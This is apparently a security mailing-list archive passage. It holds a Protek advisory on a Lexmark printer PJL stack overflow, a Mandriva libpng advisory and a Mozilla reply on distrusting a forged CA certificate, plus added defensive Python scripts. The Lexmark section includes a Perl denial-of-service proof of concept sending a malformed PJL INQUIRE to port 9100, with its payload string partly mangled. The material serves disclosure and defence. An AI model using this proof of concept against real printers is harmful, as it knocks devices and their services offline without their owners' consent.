2) Report Timeline


2010-01-06  Vendor Contacted
2010-01-09  Vendor Response
2010-01-09  Vendor request a PoC
2010-01-10  PoC is sent to the vendor
2010-01-12  Vendor confirms they received the PoC
2010-01-13  Vendor confirms the vulnerability
2010-03-22  Public release of this advisory

#

==
3) Technical details
==

Multiple Lexmark Laser Printers contain remote stack overflow
vulnerabilities in their PJL processing functionality. These
vulnerabilities could lead to remote code execution on the printer
without authentication. The device freezes when a specially crafted PJL
request is sent to the daemon with an invalid argument on the PJL INQUIRE
command.

#

=
4) Product affected
=

The list is too long; you can find the information on the Lexmark web site:

http://support.lexmark.com/alerts


#

=
5) The Code
=


#!/usr/bin/perl -w
# Found by Francis Provencher for Protek Research Lab's
# {PRL} Lexmark Multiple Laser Printer Remote Stack Overflow PoC
#
# This PoC will completely DoS the printer and all its services. Use it
# at your own risk.
#

use IO::Socket;
if (@ARGV < 1){
exit
}
$ip = $ARGV[0];
#open the socket
my $sock = new IO::Socket::INET (
PeerAddr => $ip,
PeerPort => '9100',
Proto => 'tcp',
);


$sock or die "no socket :$!";
send($sock, "\033%-1234...@pjl INQUIRE
\r\n",0);



close $sock;




#
(PRL-2010-01)
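As an added defensive illustration (not part of the advisory or the author's PoC), the following Python inspects a port-9100 job stream before it reaches the printer and flags PJL INQUIRE lines whose argument is overlong or not a variable name, the condition the advisory describes. The command allowlist, the 256-byte line bound and the 32-character variable-name bound are assumptions for this example, not values from the advisory or the PJL specification; both sample jobs are constructed.

```python
import re

UEL = b"\x1b%-12345X"   # Universal Exit Language sequence that opens a PJL job
# Allowlist of PJL commands a print spooler normally emits (assumption for this
# example; tune it to the job streams actually seen on the fleet).
KNOWN_COMMANDS = {"COMMENT", "ENTER", "INQUIRE", "DINQUIRE", "INFO", "SET",
                  "DEFAULT", "RESET", "ECHO", "JOB", "EOJ", "USTATUS", "USTATUSOFF"}
# INQUIRE/DINQUIRE take an optional "LPARM : <personality>" modifier and one
# variable name; the 32-character name bound is assumed, not from the spec.
INQUIRE_ARG = re.compile(r"^(?:(?:LPARM|IPARM)\s*:\s*[A-Z0-9_]+\s+)?[A-Z][A-Z0-9_]{0,31}$")
MAX_LINE = 256          # assumed sane upper bound for a single PJL command line


def inspect_pjl(stream):
    """Return [(line_no, severity, reason)] for suspicious PJL lines in a job.

    Only the PJL header is examined; once @PJL ENTER LANGUAGE switches the
    printer to PCL/PostScript the rest of the stream is page data, not PJL.
    """
    findings = []
    text = stream.split(UEL, 1)[1] if UEL in stream else stream
    for no, raw in enumerate(text.split(b"\n"), 1):
        line = raw.rstrip(b"\r")
        if not line.startswith(b"@PJL"):
            continue
        if len(line) > MAX_LINE:
            findings.append((no, "high", f"PJL line of {len(line)} bytes exceeds {MAX_LINE}"))
        try:
            body = line[4:].decode("ascii").strip()
        except UnicodeDecodeError:
            findings.append((no, "high", "non-ASCII bytes inside PJL command"))
            continue
        if not body:
            continue                         # a bare "@PJL" line is a legal no-op
        cmd, _, arg = body.partition(" ")
        cmd = cmd.upper()
        if cmd not in KNOWN_COMMANDS:
            findings.append((no, "medium", f"unknown PJL command {cmd!r}"))
        elif cmd in ("INQUIRE", "DINQUIRE") and not INQUIRE_ARG.match(arg.strip().upper()):
            findings.append((no, "high", f"malformed {cmd} argument ({len(arg)} bytes)"))
        if cmd == "ENTER":
            break
    return findings


# Constructed sample jobs: a normal spooler header, and a request shaped like the
# advisory's description (an INQUIRE whose argument is not a variable name).
BENIGN_JOB = (UEL + b"@PJL\r\n"
              b"@PJL JOB NAME=\"quarterly-report\"\r\n"
              b"@PJL INQUIRE PAGECOUNT\r\n"
              b"@PJL ENTER LANGUAGE=PCL\r\n"
              b"\x1bE page data follows here")
SUSPECT_JOB = UEL + b"@PJL INQUIRE " + b"A" * 2000 + b"\r\n"

if __name__ == "__main__":
    for name, job in (("benign", BENIGN_JOB), ("suspect", SUSPECT_JOB)):
        print(name, inspect_pjl(job) or "no findings")
```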


[ MDVSA-2010:063 ] libpng

2010-03-23 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:063
 http://www.mandriva.com/security/
 ___

 Package : libpng
 Date: March 22, 2010
 Affected: 2008.0, Corporate 4.0, Multi Network Firewall 2.0
 ___

 Problem Description:

 Multiple vulnerabilities has been found and corrected in libpng:
 
 libpng before 1.2.37 does not properly parse 1-bit interlaced images
 with width values that are not divisible by 8, which causes libpng
 to include uninitialized bits in certain rows of a PNG file and
 might allow remote attackers to read portions of sensitive memory
 via out-of-bounds pixels in the file (CVE-2009-2042).
 
 The png_decompress_chunk function in pngrutil.c in libpng 1.0.x before
 1.0.53, 1.2.x before 1.2.43, and 1.4.x before 1.4.1 does not properly
 handle compressed ancillary-chunk data that has a disproportionately
 large uncompressed representation, which allows remote attackers to
 cause a denial of service (memory and CPU consumption, and application
 hang) via a crafted PNG file, as demonstrated by use of the deflate
 compression method on data composed of many occurrences of the same
 character, related to a decompression bomb attack (CVE-2010-0205).
 
 Packages for 2008.0 are provided for Corporate Desktop 2008.0
 customers.
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2042
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0205
 ___

 Updated Packages:

 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLp88BmqjQ0CJFipgRAl2vAKCNCYs8gf3lw0tqgRMM

Re: Firefox 3.6 for Windows includes a forged CA cert

2010-03-23 Thread dveditz
> a cert labeled "MD5 Collisions Inc (http://www.phreedom.org/md5)" [...]
> Yes, it's expired, so it poses no real threat, but why is the Mozilla
> Project shipping Firefox with that cert?  It just causes FUD.

This is an override for the forged cert, with all trust bits removed. That
way, should the demo cert make it into the wild, users will get a hard
failure rather than an overridable one. We worried that many users are
trained to accept "expired" certs as fairly normal and would not notice it
was an expired intermediate rather than the end cert.

For more information please see
https://bugzilla.mozilla.org/show_bug.cgi?id=471715

-Dan Veditz
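
The mechanism Dan describes is visible in NSS's built-in root module, which is compiled from a text file (certdata.txt, under lib/ckfw/builtins in the NSS tree): each certificate object is paired with a trust object, and a distrust entry is one whose trust flags are all CKT_NSS_NOT_TRUSTED rather than the CKT_NSS_TRUSTED_DELEGATOR of a real anchor. The script below is an added example (mine, not Mozilla's or NSS's code) that parses that format and separates explicitly distrusted labels from server-auth anchors, which is the check to run if you want to confirm what a given Firefox build actually ships. The embedded excerpt is constructed in certdata.txt syntax with the binary MULTILINE_OCTAL payloads shortened to a few bytes; the second entry's label is taken from the quoted message above.

```python
"""List explicit distrust entries in an NSS certdata.txt (added example, not NSS code)."""
import sys

# Constructed excerpt in certdata.txt syntax. In the real file the DER and hash
# payloads are long MULTILINE_OCTAL blocks; the parser skips them up to END anyway.
SAMPLE_CERTDATA = r"""
BEGINDATA
#
# Certificate "Example Trusted Root"
#
CKA_CLASS CK_OBJECT_CLASS CKO_CERTIFICATE
CKA_TOKEN CK_BBOOL CK_TRUE
CKA_LABEL UTF8 "Example Trusted Root"
CKA_VALUE MULTILINE_OCTAL
\060\202\003\000
END

# Trust for "Example Trusted Root"
CKA_CLASS CK_OBJECT_CLASS CKO_NSS_TRUST
CKA_LABEL UTF8 "Example Trusted Root"
CKA_CERT_SHA1_HASH MULTILINE_OCTAL
\001\002\003
END
CKA_TRUST_SERVER_AUTH CK_TRUST CKT_NSS_TRUSTED_DELEGATOR
CKA_TRUST_EMAIL_PROTECTION CK_TRUST CKT_NSS_TRUSTED_DELEGATOR
CKA_TRUST_CODE_SIGNING CK_TRUST CKT_NSS_TRUSTED_DELEGATOR
CKA_TRUST_STEP_UP_APPROVED CK_BBOOL CK_FALSE

#
# Certificate "MD5 Collisions Inc (http://www.phreedom.org/md5)"
#
CKA_CLASS CK_OBJECT_CLASS CKO_CERTIFICATE
CKA_LABEL UTF8 "MD5 Collisions Inc (http://www.phreedom.org/md5)"
CKA_VALUE MULTILINE_OCTAL
\060\202\002\000
END

# Trust for "MD5 Collisions Inc (http://www.phreedom.org/md5)"
CKA_CLASS CK_OBJECT_CLASS CKO_NSS_TRUST
CKA_LABEL UTF8 "MD5 Collisions Inc (http://www.phreedom.org/md5)"
CKA_TRUST_SERVER_AUTH CK_TRUST CKT_NSS_NOT_TRUSTED
CKA_TRUST_EMAIL_PROTECTION CK_TRUST CKT_NSS_NOT_TRUSTED
CKA_TRUST_CODE_SIGNING CK_TRUST CKT_NSS_NOT_TRUSTED
CKA_TRUST_STEP_UP_APPROVED CK_BBOOL CK_FALSE
"""

TRUST_ATTRS = ("CKA_TRUST_SERVER_AUTH", "CKA_TRUST_EMAIL_PROTECTION", "CKA_TRUST_CODE_SIGNING")


def parse_objects(text):
    """Yield each PKCS#11 object as {attribute: value}; a CKA_CLASS line starts a new object."""
    lines = iter(text.splitlines())
    obj = None
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 2)          # attribute, CK type, value
        if len(parts) < 2:                   # BEGINDATA and similar directives
            continue
        attr, ctype = parts[0], parts[1]
        value = parts[2] if len(parts) == 3 else ""
        if ctype == "MULTILINE_OCTAL":       # binary payload: consume lines up to END
            for inner in lines:
                if inner.strip() == "END":
                    break
            value = "<octal>"
        elif ctype == "UTF8":
            value = value.strip('"')
        if attr == "CKA_CLASS":
            if obj is not None:
                yield obj
            obj = {}
        if obj is not None:
            obj[attr] = value
    if obj is not None:
        yield obj


def trust_table(text):
    """label -> {usage: CKT_* flag} for every CKO_NSS_TRUST object."""
    return {o.get("CKA_LABEL", "?"): {a: o.get(a) for a in TRUST_ATTRS}
            for o in parse_objects(text) if o.get("CKA_CLASS") == "CKO_NSS_TRUST"}


def distrusted_labels(text):
    """Entries whose every usage is CKT_NSS_NOT_TRUSTED: an explicit distrust, so a chain
    through that cert fails hard instead of producing an overridable error."""
    return sorted(label for label, flags in trust_table(text).items()
                  if all(v == "CKT_NSS_NOT_TRUSTED" for v in flags.values()))


def trusted_for(text, usage="CKA_TRUST_SERVER_AUTH"):
    """Entries that are trust anchors for the given usage."""
    return sorted(label for label, flags in trust_table(text).items()
                  if flags.get(usage) == "CKT_NSS_TRUSTED_DELEGATOR")


if __name__ == "__main__":
    data = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_CERTDATA
    print("explicitly distrusted:", distrusted_labels(data))
    print("server-auth anchors:", len(trusted_for(data)))
```

Run it against a real certdata.txt to see the full distrust list alongside the anchors. Note that an entry being absent from the store is not the same as a distrust entry: an unknown intermediate that chains to a real root validates up to that root, and the only error left is whatever the leaf or intermediate's own fields produce, which for an expired cert is exactly the overridable warning the message above is worried about.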